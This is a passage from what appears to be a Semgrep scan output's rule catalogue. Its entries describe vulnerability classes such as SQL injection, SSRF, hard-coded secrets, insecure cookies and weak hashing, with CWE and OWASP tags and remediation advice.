unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","id":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","name":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","id":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","name":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mysql.express-mysql-sqli.express-mysql-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"help":{"markdown":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash)\n - [https://cwe.mitre.org/data/definitions/328.html](https://cwe.mitre.org/data/definitions/328.html)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","id":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","name":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","id":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","name":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express","id":"javascript.express.db.sequelize-express.sequelize-express","name":"javascript.express.db.sequelize-express.sequelize-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sequelize-express.sequelize-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"help":{"markdown":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf)\n - [https://www.cvedetails.com/cve/CVE-2020-28168/](https://www.cvedetails.com/cve/CVE-2020-28168/)\n - [https://owasp.org/www-community/attacks/Server_Side_Request_Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery)\n","text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"helpUri":"https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","id":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","name":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"help":{"markdown":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted)\n - [https://laravel.com/docs/9.x/responses#cookies-and-encryption](https://laravel.com/docs/9.x/responses#cookies-and-encryption)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management)\n","text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","id":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","name":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","id":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","name":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","id":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","name":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","id":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","name":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"help":{"markdown":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash)\n - [https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile](https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile)\n","text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"helpUri":"https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","id":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","name":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","id":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","name":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"help":{"markdown":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment)\n - [https://cwe.mitre.org/data/definitions/915.html](https://cwe.mitre.org/data/definitions/915.html)\n - [https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md](https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md)\n","text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment","id":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","name":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","MEDIUM CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.audit.mass-assignment.mass-assignment"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","id":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","name":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"help":{"markdown":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href)\n - [https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI](https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI)\n - [https://github.com/pugjs/pug/issues/2952](https://github.com/pugjs/pug/issues/2952)\n","text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","id":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","name":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-href.var-in-href"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"help":{"markdown":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters)\n - [https://trojansource.codes/](https://trojansource.codes/)\n","text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"helpUri":"https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters","id":"generic.unicode.security.bidi.contains-bidirectional-characters","name":"generic.unicode.security.bidi.contains-bidirectional-characters","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: generic.unicode.security.bidi.contains-bidirectional-characters"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password","id":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","name":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-empty-password.pgx-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"help":{"markdown":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: 